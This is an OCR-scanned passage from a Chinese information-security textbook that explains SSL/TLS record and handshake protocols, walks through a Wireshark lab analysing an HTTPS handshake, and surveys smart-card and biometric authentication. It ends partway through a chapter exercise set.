@ 注意 : 信和 的 右上 角 有 没有 会 出 现 一 个 加 密 的 标记 ? 

@ 单 击 “ 发 送 ”" 按 钮 发 送 加 密 邮 件 。 

@ 捕获 加 密 邮件 数据 包 , 简 要 分 析 一 下 。 

【实验 思考 】 

(1) 结合 实验 ,说 明 数 字 证 书 的 作用 及 使 用 方法 。 

(2) 数字 签名 是 不 是 书面 签名 的 数字 图 像 ? 

(3) 如 果 不 采 用 本 实验 的 方法 ,发 送 的 邮件 是 否 安全 ? 按 下 述 步 又 截获 邮件 数据 包间 
进行 分 析 ,然后 与 实验 步骤 4 捕获 的 数据 包 比 较 。 最 后 写 出 结论 。 

Oz@ 在 Outlook Express 上 以 邮箱 x@163. com 向 邮箱 y@163. com 发 送 邮 件 ,其 中 不 用 
数字 签名 和 加 密 , 但 是 使 用 了 SSL 加 密 , 在 接收 者 的 计算 机 上 接收 邮件 ,并 抓 取 数 据 包 。 

@ 直接 通过 163 邮箱 服务 发 送 邮 件 ,由 x@163. com 向 邮箱 y@163. com 发 送 邮 件 , 但 
是 不 采用 数字 签名 和 公 钥 加 密 技术 ,也 不 采用 SSL, 在 接收 者 端 接收 邮件 ,并 抓 取 数 据 包 进 
行 深 入 分 析 。 


计 


9.6 SSL 技术 


SSL(Secure Sockets Layer, 安 全 套 接 层 ) 是 一 种 对 网 络 通信 提供 安全 及 数据 完整 性 的 
安全 协议 ,可 以 为 传输 数据 提供 安全 通道 并 具有 识别 用 户 实体 身份 的 功能 ,确保 数据 在 网 络 
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上 的 传输 过 程 中 不 会 被 截取 及 窃听 。SSL 协议 工作 在 TCP/IP 协议 模型 的 网 络 层 和 应 用 层 
之 间 , 能 够 为 上 层 的 应 用 程序 提供 信息 加 密 、 身 份 认证 和 消息 是 否 被 修改 的 鉴别 服务 ,使 得 
朋 户 和 服务 器 之 间 的 通信 能够 在 可 靠 、 安 全 的 通道 上 传输 ,所 有 基于 TCP/IP 的 应 用 程序 都 
可 以 通过 SSL 协议 进行 可 靠 传 输 。SSL 协议 在 通信 之 前 会 确认 认证 服务 器 的 合法 性 ,然后 
协商 对 称 的 加 密 算 法 和 会 话 密 钥 ,这 样 所 有 的 应 用 层 数据 就 可 以 使 用 会 话 密 钥 进行 加 密 
传输 。 

另 一 种 安全 协议 是 TLS(Transport Layer Security, 传输 层 安 全 ) ,与 SSL 基本 一 致 ,只 
有 少许 差别 。 

SSL 协议 分 为 两 层 : SSL 记录 协议 和 SSL 握手 协议 ,如 图 9-3 所 示 。 


应 用 层 协议 (例如 HTTP) 
握手 协议 | ”修改 密 文 协议 | 报警 协议 
SSL 记 录 协 议 
TE 
IP 


图 9-3 SSL 协议 体系 结构 


(1) SSL 记录 协议 (SSL Record Protocol) : 建立 在 可 靠 的 传输 协议 (如 TCP) 之 上 ,为 
高 层 协 议 提供 数据 封装 、 压 缩 、 加 密 等 基本 功能 的 支持 。 

(2) SSL 握手 协议 (SSL Handshake Protocol): 建立 在 SSL 记录 协议 之 上 ,用 于 在 实际 
的 数据 传输 开始 前 ,通信 双方 进行 身份 认证 ,协商 加 密 算法 、 交 换 加 密 密 钥 等 。 

SSL 协议 实际 上 是 SSL 握手 协议 .SSL 修改 密 文 协议 .SSL 报警 协议 和 SSL 记录 协议 
组 成 的 一 个 协议 族 。 

1. SSL 记录 协议 

SSL 记录 协议 为 SSL 连接 提供 两 种 服务 : 机 密 性 和 报 文 完整 性 。 

在 SSL 协议 中 ,所 有 的 传输 数据 都 被 封装 在 记录 中 。 记 录 是 由 记录 头 和 记录 数据 (长 
度 不 为 0) 组 成 的 。 所 有 的 SSL 通信 都 使 用 SSL 记录 层 , 记 录 协 议 封 装 上 层 的 握手 协议 、. 报 
警 协议 .修改 密 文 协议 。SSL 记录 协议 包括 记录 头 和 记录 数据 格式 的 规定 。 

SSL 记录 协议 定义 了 要 传输 数据 的 格式 , 它 位 于 一 些 可 靠 的 传输 协议 之 上 (如 TCP)， 
用 于 各 种 更 高 层 协 议 的 封装 。 主 要 完成 分 组 和 组 合 、 压 缩 和 解压 缩 ,以 及 消息 认证 和 加 密 
等 。 加 密 主要 是 利用 IDEA .DES、3DES 或 其 他 加 密 算法 。 

2. SSL 报警 协议 

SSL 报警 协议 是 用 来 为 对 等 实体 传递 SSL 的 相关 警告 。 如 果 在 通信 过 程 中 某 一 方 发 
现任 何 异 常 ,就 需要 给 对 方 发 送 一 条 警示 消息 通告 。 警 示 消 息 有 两 种 : 

(1) Fatal 错误 。 如 传递 数据 过 程 中 发 现 错误 的 MAC ,双方 就 需要 立即 中 断 会 话 , 同 时 
消除 自己 缓冲 区 相应 的 会 话 记录 。 

(2) Warning 消息 。 这 种 情况 ,通信 双方 通常 都 只 是 记录 上 日志, 而 对 通信 过 程 不 造成 任 

可 影响 。SSL pih we ee let tas 协商 具体 的 加 密 算法 和 

MAC 算法 以 及 保密 密 钥 ,用 来 保护 在 SSL 记录 中 发 送 的 数据 。 

3. SSL 修改 密 文 协 议 


为 了 保障 SSL 传输 过 程 的 安全 性 ,客户 端 和 服务 器 双方 应 该 每 隔 一 段 时 间 改 变 加 密 规 
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范 。SSL 修改 密 文 协议 是 3 个 高 层 的 特定 协议 之 一 ,也 是 其 中 最 简单 的 一 个 。 在 客服 端 和 
服务 器 完成 握手 协议 之 后 , 它 需 要 向 对 方 发 送 相关 消息 (该 消息 只 包含 一 个 值 为 1 的 单字 
节 ) ,通知 对 方 随后 的 数据 将 用 刚刚 协商 的 密码 规范 算法 和 关联 的 密 钥 处 理 , 并 负责 协调 本 
方 模块 按照 协商 的 算法 和 密 钥 工作 。 

4. SSL 握手 协议 

SSL 握手 协议 被 封装 在 记录 协议 中 .该 协议 允许 服务 器 与 客户 机 在 应 用 程序 传输 和 接 
收 数据 之 前 互相 认证 ,协商 加 密 算法 和 密 钥 。 在 初次 建立 SSL 连接 时 ,服务 器 与 客户 机 交 
换 一 系列 消息 。 这 些 消息 交换 能 够 实现 的 操作 包括 : 客户 机 认证 服务 器 ,允许 客户 机 与 服 
务 器 选择 双方 都 支持 的 密码 算法 ,可 选择 的 服务 器 认证 客户 ,使 用 公 钥 加 密 技术 生成 共享 
密 钥 。 

SSL 握手 协议 报 文 关 包括 3 个 字段 : 类 型 字段 (1 字 节 ) ,指明 使 用 的 SSL 握手 协议 报 
文 类 型 ;长 度 字段 (3 字 节 ), 给 出 以 字 节 为 单位 的 报 文 长 度 ;内 容 字 段 (三 1 字 节 ), 给 出 使 用 
的 报 文 的 有 关 参 数 。 

SSL 握手 协议 的 报 文 类 型 如 表 9-3 所 示 。 


表 9-3 SSL 握手 协议 报 文 类 型 


报 文 类 型 参 数 
hello_request 空 
client_hello 版 本 、 随 机 数 、 会 话 ID . 密 文 族 .压缩 方法 
server_hello 版 本 、 随 机 数 、 会 话 ID 、 密 文 族 .压缩 方法 
certificate X. 509 v3 证 书 链 
Server_key_exchange 参数 ,签名 
certificate_request 类 型 .授权 
server_done 空 
certificate_verify 签名 
client_key_exchange 参数 签名 
finished Hash 值 


SSL 握手 协议 过 程 , 即 建 立 服务 器 和 客户 端 之 间 安 全 通信 的 过 程 , 共 分 4 个 阶段 ,如 
图 9-4 所 示 。 其 中 , 带 x 的 传输 是 可 选 的 或 者 与 站 点 相关 的 ,并 不 总 是 发 送 的 报 文 。 

1) 建立 安全 协商 阶段 

这 一 阶段 用 于 协商 保密 和 认证 算法 。 首 先 由 客户 机 向 服务 器 发 送 client_hello 报 文 , 服 
务 器 向 客户 机 回应 server_hello 报 文 。 建 立 的 安全 属性 包括 协议 版 本 、 会 话 ID、 密 文 族 、 压 
缩 方 法 ,同时 生成 并 交换 用 于 防止 重 放 攻 击 的 随机 数 。 密 文 族 参 数 包 括 密 钥 交 换 方 法 
(Deffie-Hellman 密 钥 交换 算法 .基于 RSA 的 密 钥 交换 和 另 一 种 实现 在 Fortezza chip 上 的 
密 钥 交换 ) ,加 密 算 法 (DES、RC4、RC2、3DES 等 )、MAC 算法 (MD5 或 SHA-1) 加密 类 型 
( 流 或 分 组 ) 等 内 容 。 
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SSL 客 户 SSL 服 务 器 


client_hello 

(1 本 2 建立 协议 版 本 、 会 话 ID、 密 文 
人 族 、 压缩 方法 、 交 接 随机 数 
certificate* 


scrver kcy cxchange* 
一 一 可 选 的 发 送 服务 只 证 书 、 请 求 
certificate request 客户 证 书 


(2) 
server_hello_done 


certificate* 

| 如 果 有 请 求 ， 客 户 发 送 证 书 
client_verify* 

change_cipher_spec 

finished 


人 二 修改 密 文 族 并 结束 握手 协议 
change_cipher_spec 


finished 


图 9-4 ”SSL 握手 协议 的 过 程 


2) 服务 器 鉴别 和 密 钥 交换 阶段 

在 hello 报 文 之 后 ,如 果 服 务 器 需要 被 认证 ,服务 器 将 发 送 其 证 书 。 如 果 需 要 ,服务 器 
还 要 发 送 server_key_exchange 报 文 ;然后 ,服务 器 可 以 向 客户 发 送 certificate_request 报 文 
请 求证 书 。 服 务 器 总 是 发 送 server_hello_done 报 文 ,指示 服务 器 的 hello 阶段 结束 。 

3) 客户 鉴别 和 密 钥 交换 阶段 

客户 一 旦 收 到 服务 器 的 server_hello_done 报 文 ,将 检查 服务 器 证 书 的 合法 性 (如 果 服 
务 器 要 求 ) ,如 果 服 务 器 向 客户 请 求 了 证 书 , 客 户 必 须发 送 客户 证 书 ,然后 发 送 client_key_ 
exchange 报 文 , 报 文 的 内 容 依赖 于 client_hello 与 server_hello 定义 的 密 钥 交换 的 类 型 。 最 
后 ,客户 可 能 发 送 client_verify 报 文 来 校 验 客户 发 送 的 证 书 ,这 个 报 文 只 能 在 具有 签名 作用 
的 客户 证 书 之 后 发 送 。 

4) 完成 握手 协议 阶段 

此 阶段 用 于 客户 端 和 服务 器 彼此 之 间 交 换 各 自 的 完成 信息 。 客 户 发 送 change_cipher_ 
spec 报 文 并 将 挂 起 的 CipherSpec 复制 到 当前 的 CipherSpec。 这 个 报 文 使 用 的 是 修改 密 文 
协议 。 然 后 ,客户 在 新 的 算法 、 对 称 密 钥 和 MAC 秘 钥 之 下 立即 发 送 finished 报 文 。finished 
报 文 验证 密 钥 交换 和 鉴别 过 程 是 成 功 的 。 服 务 器 对 这 两 个 报 文 进行 响应 ,发 送 自己 的 
change_cipher_spec 报 文 和 finished 报 文 。 完 成 认证 ,握手 结束 ,客户 与 服务 器 可 以 发 送 应 
用 层 数据 了 。 

当 这 4 个 阶段 完成 后 ,在 服务 器 和 客户 端 之 间 就 建立 起 了 可 靠 的 会 话 , 从 而 保证 两 者 之 
间 通 信 的 安全 性 。 
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应 用 层 通 过 SSL 协议 把 数据 传 给 传输 层 时 ,已 是 被 加 密 后 的 数据 ,此 时 TCP/IP 协议 
只 需 负 责 将 其 可 靠 地 传送 到 目的 地 即 可 , 故 SSL 协议 弥补 了 TCP/IP 协议 安全 性 较 差 的 弱 
点 。 目 前 ,SSL 协议 最 为 广泛 地 应 用 于 Internet 上 的 身份 认证 ,以 及 Web 服务 器 和 用 户 端 
浏览 器 之 间 的 安全 数据 通信 ,尤其 是 电子 商务 、 网 上 银行 等 对 网 络 安全 要 求 较 高 的 企业 。 
SSL 协议 已 成 为 用 来 识别 服务 器 的 网 站 和 网 站 访客 的 身份 ,以 及 浏览 器 的 用 户 和 Web 服务 
器 之 间 加 密 通 信 的 国际 标准 。 

与 SSL 密切 相关 的 有 HTTPS 和 OpenSSL。SSL 是 在 客户 端 和 服务 器 之 间 建 立 一 条 
SSL 安全 通道 的 安全 协议 ,而 OpenSSL 是 TLS/SSL 协议 的 开源 实现 ,提供 开发 库 和 命令 
行程 序 。HTTPS 则 是 HTTP 的 加 密 版 ,其 底层 使 用 的 加 密 协 议 是 SSL。 

OpenSSL 是 一 个 支持 SSL 认证 的 服务 器 , 它 是 一 个 源码 开放 的 自由 软件 ,支持 多 种 操 
作 系统 。OpenSSL 的 目的 是 实现 一 个 完整 的 ,健壮 的 、 商 业 级 的 开放 源码 工具 ,通过 强大 的 
加 密 算法 来 实现 建立 在 传输 层 之 上 的 安全 性 。OpenSSL 包含 一 套 SSL 协议 的 完整 接口 ,应 
用 程序 应 用 它们 可 以 很 方便 地 建立 起 安全 套 接 层 ,进而 能 够 通过 网 络 进行 安全 的 数据 传输 。 

实验 9-3 ”SSL 通信 过 程 分 析 实 验 

【实验 目的 】 

(1) 了 解 SSL 的 工作 原理 。 

(2) 通过 抓 取 数据 包 , 了 解 客户 端 与 Web 服务 端的 实际 工作 流 。 

【实验 原理 】 

双向 认证 SSL 协议 的 通信 过 程 中 ,服务 器 和 用 户 双 方 必须 都 有 证 书 。 其 通信 过 程 大 致 
如 下 。 

(1) 浏览 器 发 送 一 个 连接 请 求 给 服务 器 ,服务 器 将 自己 的 证 书 ( 包 含 服务 器 公 钥 
S_PuKey) 对称 加 密 算法 种 类 及 其 他 相关 信息 返回 客户 端 。 

(2) 客户 端 浏 览 器 检查 服务 器 传送 的 CA 证 书 是 否 由 自己 信赖 的 CA 中 心 签发 。 若 是 ， 
执行 第 (4) 步 ;否则 给 客户 一 个 警告 信息 ,询问 是 否 继续 访问 。 

(3) 客户 端 浏览 器 比较 证 书 里 的 信息 ,如 证 书 有 效 期 、 服 务 器 域名 和 公 钥 S_PuKey 与 
服务 器 传 回 的 信息 是 否 一 致 ,如 果 一 致 , 则 浏览 器 完成 对 服务 器 的 身份 认证 。 

(4) 服务 器 要 求 客 户 端 发 送 客户 端 证 书 (包含 客户 端 公 钥 C_PuKey) .支持 的 对 称 加 密 
方案 及 其 他 相关 信息 。 收 到 后 ,服务 器 进行 相同 的 身份 认证 , 若 没 有 通过 验证 , 则 拒绝 连接 。 

(5) 服务 器 根据 客户 端 浏览 器 发 送 的 密码 种 类 ,选择 一 种 加 密 程 度 最 高 的 方案 ,用 客户 
端 公 钥 C_PuKey 加 密 后 通知 浏览 器 。 

(6) 客户 端 通过 私 钥 C_PrKey 解密 后 ,得 知 服务 器 选择 的 加 密 方案 ,并 选择 一 个 通话 
密 钥 key, 接 着 用 服务 器 公 钥 S_PuKey 加 密 后 发 送 给 服务 器 。 

(7) 服务 器 接收 到 浏览 器 传送 的 消息 ,用 私 钥 S_PrKey 解密 ,获得 通话 密 钥 key。 

(8) 接 下 来 的 数据 传输 都 使 用 该 对 称 密 钥 key 进行 加 密 。 

由 此 可 见 ,SSL 协议 通过 非 对 称 密 钥 机 制 保证 双方 身份 认证 ,并 完成 建立 连接 ,在 实际 
数据 通信 时 通过 对 称 密 钥 机 制 保障 数据 安全 性 。 


【实验 环境 】 
本 地 主机 IP 地 址 : (客户 端 ) 。 
远程 主机 (百度 服务 器 )IP 地 址 : (服务 器 ,访问 https://www. baidu. com) 。 
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【实验 分 析 】 

实验 时 ,启动 协议 分 析 器 Wireshark ,打开 浏览 器 ,在 地 址 栏 输入 https://www. baidu. 
com, 开 始 抓 取 数据 包 。 在 Wireshark 过 滤 工 具 栏 过 滤 掉 其 他 无 关 数 据 包 。 

整个 通信 过 程 由 客户 端 发 起 ,由 于 SSL 协议 是 基于 传输 层 的 TCP 协议 的 ,所 以 首先 经 
过 三 次 握手 与 服务 器 建立 TCP 连接 。 一 旦 连接 建立 成 功 ,就 进入 SSL 握手 和 数据 传输 阶 
段 。 下 面 结合 TCP 和 SSL 原理 对 数据 交互 流程 进行 分 析 ,请 根据 实际 捕获 数据 填写 : 

(1) 在 1~3 帧 中 ,客户 端 与 服务 器 先 通 过 三 次 握手 建立 TCP 连接 ,由 于 使 用 的 是 
HTTPS 协议 ,所 以 传输 层 的 端口 号 为 ( )s 

(2) 从 第 4 帧 开始 就 进入 SSL 的 握手 阶段 。 客 户 端 向 服务 器 发 送 ( ) 消 息 , 其 中 包 
含 了 客户 端 所 支持 的 各 种 算法 。 从 解码 中 可 以 看 出 主要 包括 RSA 和 DH 两 大 类 算法 ,由 它 
们 产生 多 种 组 合 。 同 时 产生 了 一 个 随机 数 ,这 个 随机 数 随 后 将 应 用 于 各 种 密 钥 的 推导 ,并 可 
以 防止 重 放 攻 击 。 

(3) 第 5 帧 为 对 方 发 过 来 的 ACK 确认 帧 ,第 6 帧 为 服务 器 发 送 的 ( ) 消 息 , 其 中 包 
含 了 服务 器 选中 的 算法 ( ) ,同时 发 来 另 一 个 随机 数 , 这 个 随机 数 与 客户 端 发 送 的 随机 数 
功能 相同 。 

(4) 第 7 帧 为 服务 器 返回 的 ( ) 消 息 , 其 中 包含 了 服务 器 的 证 书 ,以 便 客 户 端 认证 服 
务 器 的 身份 ,并 从 中 获取 其 公 钥 。 同 时 服务 器 告诉 客户 端 ( ) ,指明 本 阶段 的 消息 已 经 发 
送 完 成 。 

(5) 第 8 帧 为 本 地 客户 端 发 送 给 服务 器 的 ACK 确认 帧 。 从 第 9 帧 开始 客户 端 向 服务 
器 发 送 ( ) 消 息 , 其 中 包含 了 客户 端 生成 的 预 主 密 钥 ,并 使 用 服务 器 的 公 钥 进行 加 密 
处 理 。 

(6) 此 时 ,客户 端 和 服务 器 各 自 以 预 主 密 钥 和 随机 数 作为 输入 ,在 本 地 计算 所 需要 的 4 
个 密 钥 参数 (其 中 包括 两 个 加 密 密 钥 和 两 个 MAC 密 钥 ) ,由 于 此 过 程 并 没有 通过 网 络 进行 
传输 ,所 以 也 就 没有 在 数据 帧 中 体现 出 来 。 

(7) 在 第 9 帧 中 客户 端 还 向 服务 器 发 送 ( ) 消 息 ,以 通告 启用 协商 好 的 各 项 参数 。 

(8) 第 10 帧 为 服务 器 向 客户 端 发 送 的 ( ) 消 息 , 第 11 帧 为 客户 端 发 来 的 确认 消息 ， 
协商 阶段 结束 。 

(9) 从 第 ( ) 帧 到 第 ( ) 帧 ,都 为 服务 器 和 客户 端 之 间 交 互 应 用 数据 信息 。 它 们 
都 使 用 协商 好 的 参数 进行 安全 处 理 。 

(10) 由 于 TCP 协议 是 面向 连接 的 ,最 后 的 几 帧 为 拆除 TCP 连接 ,由 客户 端 发 出 FIN 
位 为 置 位 的 TCP 段 ,对 方 发 来 ACK 确认 帧 以 及 FIN 位 为 置 位 的 TCP 段 ,客户 端 再 发 出 
ACK 帧 进行 确认 ,至 此 TCP 连接 释放 ,传输 结束 。 


9.7 智能 卡 认 证 技术 


智能 卡 也 称 IC 卡 ,一 种 内 置 集成 电路 的 芯片 ,芯片 中 存 有 与 用 户 身份 相关 的 数据 ， 智 
能 卡 由 专门 的 厂商 通过 专门 的 设备 生产 ,是 不 可 复制 的 硬件 。 智 能 卡 由 合法 用 户 随身 携带 ， 
。 272 。 


登录 时 必须 将 智能 卡 插 人 专用 的 读 卡 器 读 取 其 中 的 信息 ,以 验证 用 户 的 身份 。 

使 用 智能 卡 技术 ,身份 认证 可 以 在 客户 端 完成 ,这 就 避免 了 一 些 用 户 信息 直接 在 网 络 上 
传输 的 安全 隐患 。 没 有 通过 认证 的 用 户 就 不 能 使 用 客户 端 , 只 有 合法 的 用 户 才能 使 用 客户 
端 来 与 服务 端 进 行 通信 。 认 证 通过 以 后 ,客户 端 和 服务 端 对 两 者 之 间 交 互 的 数据 可 以 使 用 
对 称 密 钥 来 加 密 , 这 样 可 以 保证 数据 的 安全 性 和 完整 性 。 

智能 卡 认证 是 通过 智能 卡 硬件 不 可 复制 来 保证 用 户 身 份 不 会 被 仿冒 。 然 而 由 于 每 次 
从 智能 卡 中 读 取 的 数据 是 静态 的 ,通过 内 存 扫 描 或 网 络 监听 等 技术 还 是 很 容易 截取 到 用 
户 的 身份 验证 信息 ,因此 还 是 存在 安全 隐患 。 智 能 卡 的 成 本 取决 于 其 硬件 的 构造 。 成 本 
越 高 的 智能 卡 , 其 保密 程度 与 安全 系数 就 越 高 ,因此 那些 成 本 较 低 的 智能 卡 ,其 安全 性 可 
能 还 不 如 软件 加 密 。 另 外 ,智能 卡 还 需 随身 携带 ,丢失 或 损坏 可 能 会 给 使 用 者 带 来 许多 


9.8 基于 生物 特征 认证 技术 


基于 生物 特征 的 身份 认证 是 以 人 体 唯一 的 ,可靠 的 稳定 的 生物 特征 (如 指纹 、 虹 膜 、 
脸 部 、 掌 纹 等 ) 为 依据 ,采用 计算 机 的 强大 功能 和 网 络 技 术 进 行 图 像 处 理 和 模式 识别 。 它 
是 一 种 可 信和 度 高 而 又 难以 伪造 的 认证 方式 ,也 正在 成 为 自动 化 世界 所 需要 的 自动 化 个 人 
身份 认证 技术 中 最 简单 而 安全 的 方法 。 但 是 这 类 方案 技术 复杂 ,并 因为 其 成 本 高 而 尚未 
被 广泛 采用 。 在 计算 机 网 络 中 ,大 多 数 认证 过 程 采用 的 还 是 密码 技术 和 数字 签名 技术 。 

基于 生物 特征 的 认证 技术 是 通过 可 测量 的 身体 或 行为 等 生物 特征 进行 身份 认证 的 一 种 
技术 。 生 物 特 征 是 指 唯一 可 以 测量 或 可 自动 识别 和 验证 的 生理 特征 或 行为 方式 。 生 物 特 征 
分 为 身体 特征 和 行为 特征 两 类 。 身 体 特征 包括 声 纹 、 指 纹 、 视 网 膜 .虹膜 .脸型 等 ,行为 特征 
包括 签名 .语音 等 。 目 前 部 分 学 者 将 视网膜 识别 .虹膜 识别 和 指纹 识别 等 归 为 高 级 生物 识别 
技术 ;将 脸型 识别 .语音 识别 和 签名 识别 等 归 为 次 级 生物 识别 技术 ;将 血管 纹理 识别 .DNA 
识别 等 归 为 “深奥 的 "生物 识别 技术 。 指 纹 识别 技术 目前 应 用 广泛 的 领域 有 门禁 系统 、 微 型 
支付 等 。 

基于 指纹 、 虹 膜 的 生物 身份 认证 方式 是 生物 技术 在 信息 安全 领域 的 应 用 ,具有 普遍 性 和 唯 
一 性 的 特点 , 但 基于 生物 识别 设备 成 本 和 识别 技术 水 平 的 考虑 , 目前 还 难以 得 到 大 规模 普及 。 

1. 指纹 

指纹 是 指 人 的 手指 末端 正面 皮肤 上 凸凹 不 平 的 纹 线 。 纹 线 有 规律 的 排列 形成 不 同 的 纹 
型 。 纹 线 的 起 点 、` 终 点 、 结 合 点 和 分 叉 点 称 为 指纹 的 细节 特征 点 。 指 纹 识 别 即 指 通过 比较 不 
同 指纹 的 细节 特征 点 来 进行 鉴别 。 全 世界 没有 两 个 人 的 指纹 是 完全 相同 的 ,即使 是 同一 人 
的 十 指 之 间 ,指纹 也 有 明显 区 别 , 因 此 指纹 可 用 于 身份 鉴定 。 指 纹 作为 身份 验证 是 准确 而 可 
靠 的 手段 ,人 类 指纹 相同 的 概率 不 到 10 ,具有 形状 不 随时 间 变 化 、 提 取 方 便 等 特点 ,将 指 
纹 作为 接 人 控制 的 手段 大 大 提高 了 其 安全 性 和 可 靠 性 。 图 9-5 是 人 指 指纹 图 ,图 9-6 是 识 
别 指纹 的 指纹 机 。 
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图 9-5 人 指 指纹 图 9-6 指纹 机 正在 读 取 指纹 信息 


指纹 识别 技术 是 目前 最 成 熟 且 价格 便宜 的 生物 特征 识别 技术 。 目 前 指纹 识别 的 技术 应 
用 最 为 广泛 , 像 应 用 在 门禁 ,考勤 系统 中 ,笔记 本 电脑 采用 指纹 识别 技术 用 于 用 户 登录 时 的 
身份 鉴定 ,其 他 如 手机 ` 汽 车、 银行 支付 都 可 应 用 指纹 识别 的 技术 。 

2. 视网膜 

视网膜 是 一 些 位 于 眼球 后 部 十 分 细小 的 神经 (一 英寸 的 1/50), 它 是 人 有 眼 感受 光线 并 将 
信息 通过 视神经 传 给 大 脑 的 重要 器 官 , 同 胶片 的 功能 有 些 类 似 , 用 于 生物 识别 的 血管 分 布 在 
神经 视网膜 周围 , 即 视网膜 四 层 细 胞 的 最 远 处 ,如 图 9-7 所 示 。 研 究 表明 ,人 类 眼球 后 部 血 
管 分 布 具有 唯一 性 ,即使 是 挛 生 子 , 这 种 血管 分 布 也 是 具有 唯一 性 的 ,除了 患 有 眼疾 或 者 严 
重 的 脑 外 伤 外 ,视网膜 中 的 血管 组 织 终生 不 变 。 

视网膜 识别 技术 要 求 激 光照 射 眼球 的 背面 以 获得 视网膜 的 特征 。 视 网 膜 特征 采样 时 ， 
视网膜 图 像 使 用 者 的 眼睛 与 录入 设备 的 距离 应 在 半 英 寸 之 内 ,并且 在 录入 设备 读 取 图 像 时 ， 
眼睛 必须 处 于 静止 状态 ,使 用 者 的 眼睛 在 注视 一 个 旋转 的 绿灯 时 ,录入 设备 从 视网膜 上 可 以 
获得 400 个 特征 点 , 同 指纹 录入 比较 ,指纹 只 能 提供 30 一 40 个 特征 点 用 来 录入 ,创建 模板 和 
完成 确认 。 一 个 视网膜 血管 的 图 样 可 压缩 为 小 于 35B 的 数字 信息 ,可 根据 对 图 样 的 节点 和 
分 支 的 检测 结果 进行 分 类 识别 。 视 网 膜 识 别 验证 效果 相当 好 ,但 成 本 较 高 ,特别 是 激光 照射 
眼球 的 背面 可 能 会 影响 使 用 者 的 健康 。 目 前 主要 使 用 在 安全 性 和 可 靠 性 要 求 较 高 的 场合 。 

3. 虹膜 

虹膜 是 巩膜 的 延长 部 分 ,是 眼球 角膜 和 晶体 之 间 的 环形 薄膜 ,每 一 个 虹膜 都 包含 一 个 独 
一 无 二 的 基于 像 冠 .水 晶体 、 细 丝 、 斑 点 、 结 构 、 凹 点 射线、 皱纹 和 条 纹 等 特征 的 结构 ,如 
图 9-8 所 示 。 虹 膜 形 貌 可 以 保持 数 十 年 没有 多 少 变化 ,其 图 样 包含 了 丰富 的 纹理 信息 ,可 以 

巩膜 


脉络 膜 


钢 网 膜 
睫 状 肌 
图 9-7 视网膜 血管 图 样 图 9-8 虹膜 样 图 
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提供 比 指纹 更 为 细致 的 信息 。 虹 膜 的 高 度 独特 性 、 稳 定性 及 不 可 更 改 的 特点 是 虹膜 可 用 作 
身份 鉴别 的 物质 基础 。 

虹膜 识别 系统 可 以 在 35 一 40cm 的 距离 采样 ,不 需要 人 有 眼 对 准 激光 设备 , 比 采集 视网膜 
图 样 要 方便 。 存 储 一 个 虹膜 图 样 需要 256B, 所 需 的 计算 时 间 为 100ms。 

目前 已 经 开发 出 基于 虹膜 的 识别 系统 可 用 于 安全 入 口 . 接 入 控制 信用卡.POS、ATM 
等 应 用 系统 中 ,能 有 效 地 进行 身份 识别 。 

4. 脸型 

人 脸 识别 是 基于 人 的 脸 部 特征 信息 进行 身份 识别 的 一 种 生物 识别 技术 。 用 摄像 机 或 摄 
像 头 采集 含有 人 脸 的 图 像 或 视频 流 . 并 自动 在 图 像 中 检测 和 跟踪 人 脸 ,进而 对 检测 到 的 人 脸 
进行 脸 部 的 一 系列 相关 技术 ,通常 也 叫 作 人 像 识别 、 面 部 识别 。 

人 脸 与 人 体 的 其 他 生物 特征 (指纹 、 虹 膜 等 ) 一 样 与 生 俱 来 , 它 的 唯一 性 和 不 易 被 复制 的 
良好 特性 为 身份 鉴别 提供 了 必要 的 前 提 , 与 其 他 类 型 的 生物 识别 比较 ,人 脸 识 别 独 具 特 色 : 

(1) 非 强制 性 : 用 户 不 需要 专门 配合 人 脸 采集 设备 ,几乎 可 以 在 无 意识 的 状态 下 就 可 
获取 人 脸 图 像 ,这 样 的 取样 方式 没有 “强制 性 ”。 

(2) 非 接触 性 : 用 户 不 需要 和 设备 直接 接触 就 能 获取 人 脸 图 像 。 

(3) 并 发 性 : 在 实际 应 用 场景 下 可 以 进行 多 个 人 脸 的 分 拣 , 判 断 及 识别 。 此 外 ,还 符合 
视觉 “以 貌 识 人 ?的 特性 ,以 及 操作 简单 .结果 直观 、 隐 项 性 好 等 特点 。 

人 脸 识别 系统 主要 包括 人 脸 图 像 采 集 及 检测 \ 人 脸 图 像 预 处 理 ` 人 脸 图 像 特征 提取 以 及 
匹配 与 识别 4 个 组 成 部 分 ,如 图 9-9 所 示 。 人 脸 识 别 的 困难 主要 是 人 脸 作 为 生物 特征 的 特 
点 所 带 来 的 。 人 脸 有 一 定 的 相似 性 和 易 变性 。 人 脸 的 外 形 很 不 稳定 ,人 可 以 通过 脸 部 的 变 
化 产生 很 多 表情 ,而 在 不 同 观 察 角度 ,人 脸 的 视觉 图 像 也 相差 很 大 ,另外 ,人 脸 识别 还 受 光 照 
条 件 ( 例 如 白天 和 夜晚 .室内 和 室外 等 )\ 人 脸 的 很 多 遮盖 物 (例如 口音 .墨镜 、 头 发 .胡须 等 )、 
年 龄 等 多 方面 因素 的 影响 。 


9-9 人 脸 识别 过 程 
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习 题 9 


1. 判断 题 
(1) 身份 认证 一 般 都 是 实时 的 ,消息 认证 一 般 不 提供 实时 性 。 ( ) 
(2) 对 等 实体 鉴别 服务 是 在 数据 传输 阶段 对 对 方 实体 的 身份 真实 性 进行 判断 。 ( ) 
2. 选择 题 ((1)、(2) 为 多 选 题 ) 
(1) 数字 证 书 可 以 存储 的 信息 包括 ( js 

A. 身份 证 号 码 、 社 会 保险 号 .驾驶 证 号 码 

B. 组 织 工商 注册 号 ` 组 织 机 构 代 码 、 组 织 税 号 


C. IP 地 址 
D. E-mail 地 址 
(2) PKI 提供 的 核心 服务 包括 ( » 
A. 认证 B. 完整 性 C. 密 钥 管理 D. 简单 机 密 性 
E. 非 否 认 
(3) 用 户 身份 鉴别 是 通过 ( ) 完 成 的 。 
A. 口令 验证 B. 审计 策略 C. 存 取 控制 D. 查询 功能 


(4) 下 列 关 于 用 户口 令 说 法 错误 的 是 ( Ys 
A. 口令 不 能 设置 为 空 
B. 口令 长 度 越 长 ,安全 性 越 高 
C. 复杂 口令 安全 性 足够 高 ,不 需要 定期 修改 
D. 口令 认证 是 最 常见 的 认证 机 制 
(5) 人 们 设计 了 ( ) ,以 改善 口令 认证 自身 安全 性 不 足 的 问题 。 
A. 统一 身份 管理 B. 指纹 认证 
C. 数字 证 书 认证 D. 动态 口令 认证 机 制 
(6) ( ) 是 防止 发 送 方 在 发 送 数 据 后 又 否认 自己 发 送 了 数据 ,接收 方 接 到 数据 后 又 
